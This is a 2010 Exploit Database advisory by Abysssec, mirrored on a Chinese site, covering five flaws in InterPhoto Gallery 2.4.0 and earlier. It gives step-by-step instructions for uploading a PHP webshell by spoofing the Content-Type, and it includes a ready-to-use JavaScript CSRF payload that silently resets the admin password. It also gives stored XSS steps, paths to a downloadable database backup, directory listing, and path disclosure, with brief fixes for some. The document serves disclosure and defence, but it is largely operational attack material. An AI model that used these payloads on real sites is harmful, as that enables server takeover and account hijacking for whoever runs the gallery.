InterPhoto Gallery – Multiple Vulnerabilities

• Exploit Database
• 113 阅读

• 作者： Abysssec
  日期： 2010-09-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14915/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155

  &apos;&apos;&apos; ________ __ ____ |\/|/ __ \ /\| || |_ \ | \/ | || | /\ | || | |_) | | |\/| | || |/ /\ \| || |_ <Day 6 (0day) | || | |__| / ____ \ |__| | |_) | |_||_|\____/_/\_\____/|____/   &apos;&apos;&apos;   - Title: InterPhoto Gallery Multiple Remote Vulnerabilities - Affected Version : <= 2.4.0 - VendorSite : http://www.weensoft.com - Discovery :Abysssec.com - Description : =============== InterPhoto Image Gallery is an open-source, simple-using, advanced, professional multi-users&apos; image website System,and it can primely protect the images of your site. InterPhoto can be used to build all kinds of sites which lay out images mainly, such as: design, fashion, exhibition, photograph, painting sites and so on.   - Vulnerabilities: ==================     1)Upload ( bypass Image Uploader ): ------------------------------------------------ InterPhoto allows register users uploading Images. InterPhoto&apos;s User can upload php webshell with this way: login in the user mode,go to "Publish Image " . select file for upload, write other field Required and submit. By Tamper Data tools (webscarab, Paros ,...) Trap Request. and change "Content-Type" field&apos;s value to "image/jpeg".   line 143-150 : ... if ($action == &apos;insertimage&apos;) { $imagefile = $_FILES[&apos;imagefile&apos;]; $valid_image_types = array(&apos;image/pjpeg&apos;, &apos;image/jpeg&apos;, &apos;image/jpg&apos;); $uploaddir = BASEPATH.&apos;MyWebsiteImages/&apos;; @chmod($uploaddir,0777); // it will chmod upload dirfor execute as well! ... as you can see in flow type it&apos;s possible to spoof jpeg request .   ln 43-56 ... if ($image_size[0] > 760 || $image_size[1] > 760) { if (@rename($uploaddir.$file_path.&apos;/&apos;.$imagename, $uploaddir.$file_path.&apos;/original/&apos;.$imagename)) { CreateImageFile($uploaddir.$file_path.&apos;/original/&apos;.$imagename, $uploaddir.$file_path."/760x760/".$imagename,&apos;760&apos;); CreateImageFile($uploaddir.$file_path.&apos;/760x760/&apos;.$imagename, $uploaddir.$file_path."/160x160/".$imagename,&apos;160&apos;); CreateImageFile($uploaddir.$file_path.&apos;/160x160/&apos;.$imagename, $uploaddir.$file_path."/80x80/".$imagename,&apos;80&apos;); CreateImageFile($uploaddir.$file_path.&apos;/80x80/&apos;.$imagename, $uploaddir.$file_path."/32x32/".$imagename,&apos;32&apos;); } }else{ if (@rename($uploaddir.$file_path.&apos;/&apos;.$imagename, $uploaddir.$file_path.&apos;/760x760/&apos;.$imagename)) { CreateImageFile($uploaddir.$file_path.&apos;/760x760/&apos;.$imagename, $uploaddir.$file_path."/160x160/".$imagename,&apos;160&apos;); CreateImageFile($uploaddir.$file_path.&apos;/160x160/&apos;.$imagename, $uploaddir.$file_path."/80x80/".$imagename,&apos;80&apos;); CreateImageFile($uploaddir.$file_path.&apos;/80x80/&apos;.$imagename, $uploaddir.$file_path."/32x32/".$imagename,&apos;32&apos;); } ... Refer to size of file you can find your shell in following directory: http://site.com/InterPhoto/MyWebsiteImages/   2)Persistent XSRFs: ------------------- Several XSRF existed in this CMS, For Example:Delete user&apos;s Image, Change Users&Admin password, Change User&Admin Info,... Now see Change Users&Admin password: +POC: Like number 1 ,go to Publish Image and select Edit HTML,and write this code: <script> function creat_request(path,parameter,method){ method = method || "post"; var remote_dive = document.createElement(&apos;div&apos;); remote_dive.id = &apos;Div_id&apos;; var style = &apos;border:0;width:0;height:0;&apos;; remote_dive.innerHTML = "<iframe name=&apos;iframename&apos; id=&apos;iframeid&apos; style=&apos;"+style+"&apos;></iframe>"; document.body.appendChild(remote_dive); var form = document.createElement("form"); form.setAttribute("method", method); form.setAttribute("action", path); form.setAttribute("target", "iframename"); for(var key in parameter) { var hiddenField = document.createElement("input"); hiddenField.setAttribute("type", "hidden"); hiddenField.setAttribute("name", key); hiddenField.setAttribute("value", parameter[key]); form.appendChild(hiddenField); } document.body.appendChild(form); form.submit(); } creat_request(&apos;http://192.168.101.4/interphoto/mydesk.edit.php&apos;,{&apos;action&apos;:&apos;updateuser&apos;,&apos;password&apos;:&apos;123456&apos;,&apos;repassword&apos;:&apos;123456&apos;,&apos;email&apos;:&apos;admin@localhost.com&apos;,&apos;userfullname&apos;:&apos;&apos;,&apos;usercompany&apos;:&apos;&apos;,&apos;useraddress&apos;:&apos;&apos;,&apos;userpostcode&apos;:&apos;&apos;,&apos;usertel&apos;:&apos;&apos;,&apos;userfax&apos;:&apos;&apos;,&apos;useronline&apos;:&apos;&apos;,&apos;userwebsite&apos;:&apos;&apos;}); </script> and submit.when any user see this section on Homepage, Delete first image that is Uploaded.     3)stored XSS : -------------- login in the user mode,go to "Publish Image " .Then in "Image Description:" section, select Edit HTML icon,and write java tag script.( also write other field Required ) and submit. for see the XSS go to Home page, and click last update image for see. Because InterPhoto used nicedit for Image Description.       4)InformationDisclosure: --------------------------------------------- 5.1)BackupDatabase is Downloadable: +POC: http://site.com/InterPhoto/admin/backup/ +Fix: restrict access to this directory by .htaccess file. 5.2)Directory listing : +POC: http://site.com/InterPhoto/admin/backup/ http://site.com/InterPhoto/MyWebsiteImages http://site.com/InterPhoto/UploadImages/ http://site.com/InterPhoto/library/ http://site.com/InterPhoto/languages/ http://site.com/InterPhoto/includes/ http://site.com/InterPhoto/config/ http://site.com/InterPhoto/templates/ http://site.com/InterPhoto/upgrade/ http://site.com/InterPhoto/admin/includes/ http://site.com/InterPhoto/admin/templates/ and .... +Fix: Create index.html in all folders.     5)Path Disclosure: -------------------------------------- InterPhoto CMShas used Smarty library(Templet Engine). +Code:for example:class Smarty undefined. /library/smarty/libs/Smarty_Compiler.class.php[line 35] class Smarty_Compiler extends Smarty { ... +POC: http://site.com/InterPhoto/library/smarty/libs/Smarty_Compiler.class.php http://site.com/InterPhoto/library/smarty/libs/plugins/modifier.date_format.php http://site.com/InterPhoto/library/smarty/templates_c/[ all files. ] +Fix: Add frist page : if(class_exists(&apos;Smarty&apos;)){ Add last page: }